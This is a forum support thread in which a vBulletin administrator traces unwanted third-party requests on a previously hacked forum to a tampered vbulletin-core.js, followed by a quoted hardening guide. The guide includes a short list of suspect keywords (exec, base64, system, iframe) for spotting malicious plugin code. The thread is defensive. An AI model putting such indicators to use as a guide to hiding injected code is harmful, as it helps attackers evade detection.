My vbulletin forum has been hacked before. Now it works fine but I see that all pages spends a lot of times to get some unwanted statistics urls.
I have disabled all plugins and base64_decode. but the bad GETs are still there.
I searched for the urls in all of VB files and in database but could not find any of the urls.
I appreciate your hints to find and remove the sites.

I am not understanding the problem. Can you link us to it? Or can you give us an image?

Here I have attached the Network connection with the unwanted links.
I have also noticed that when I turn off javascript, the request to remote url and hence the delay disapears.

So you have something on your site that is calling some javascript you don't want it to call? Have you looked in your page source to see where it is - where is it? Are you using a totally default style?

That's right Lynne. However I could not find on the source of the page, nor on clientscripts any wierd script containing the url. Can it be encrypted somehow, if so, how to detect it?
I am using a slightly modifed template based on of the default style.
I should also mention that the site has been defaced a while ago but I managed to remove all the traces of base64_decode injected to the template table.

Do you have a thanks plugin installed or have removed one at some point

@ForceHSS. Yes I have Thanks plugin. ّ+I have install and re-install it several times during upgrades, etc. Now, wheather or not it is enabled or not, I get the 3rd party url GET anyway.
Why?

Your clientscript/vbulletin-core.js file has been hacked (could be others also, but definitely that one). I'd suggest downloading a fresh set of files from the members area and uploading them to your site. Then, you really need to get your site secured.

You are amzing Lynne! I just copied a fresh vbulletin-core.js to clientscripts and the bad delay is gone.
What should I do to avoid this to happen again?
Thanks a lot for your valuable hint.

This is copied from a post Wayne Luke had made about securing your site.

***
There are four steps to securing your site. If you don't do them all or you do them in the wrong order than you're still susceptible to being attacked again.

Close the hole...
This has three subparts in this instance.
1. Delete your install folder
2. Review your admin users and delete any that don't belong. Don't ban them. Don't make them regular users. Delete them.
3. Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.

Fill the Hole...
There are seven subparts in this instance.
1. Review your files for changes. You can do this under Maintenance -> Diagnostics.
2. Delete any Suspect Files.
3. Replace any files marked as "Does not contain expected contents"
4. Scan your plugins for malicious code (exec, base64, system, pass_thru, iframe are all suspect keywords). Delete any you find.
5. Repair any templates. Any templates that you don't have notes on changing, you need to revert. If you're using a custom style, it is best to delete your existing style and reimport from a fresh download.
6. Update your Addon Products.
7. Rebuild your datastores. You can use tools.php in the "do not upload" folder to do this. Upload it to your admincp directory, delete when done.

Secure the Hole
Parts of this were done by closing the hole but there are still things to do here.
1. Keep notes of all changes you make to the system - what templates and phrases you change, what files belong to which addons, what plugins do the addons install.
2. Consider using a separate Super Admin who has access to admin logs in the AdminCP. There should be only one Super Admin.
3. Create a lower permission Administrator for every day use.
4. Review your permissions in the system.
5. Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.
6. Move your attachments outside the forum root directory.
7. Create a complete backup of your site. Make database backups weekly.

Vigilance
You need to keep active on the security of the site.
1. Give out the fewest permissions necessary for anyone to do their job
2. Make sure your hosting provider updates the software.
3. Update to the latest vBulletin when it is released.
4. Make sure your addons are always up to date.

Lynne, I've noticed that the bad url calls still happen when I go to admincp (which I've renamed).

I also copied fresh *.js into clientscripts but the problem persists. Do you have any ideas about this?
Thanks

I would suggest reuploading a full set of fresh files downloaded from the members area.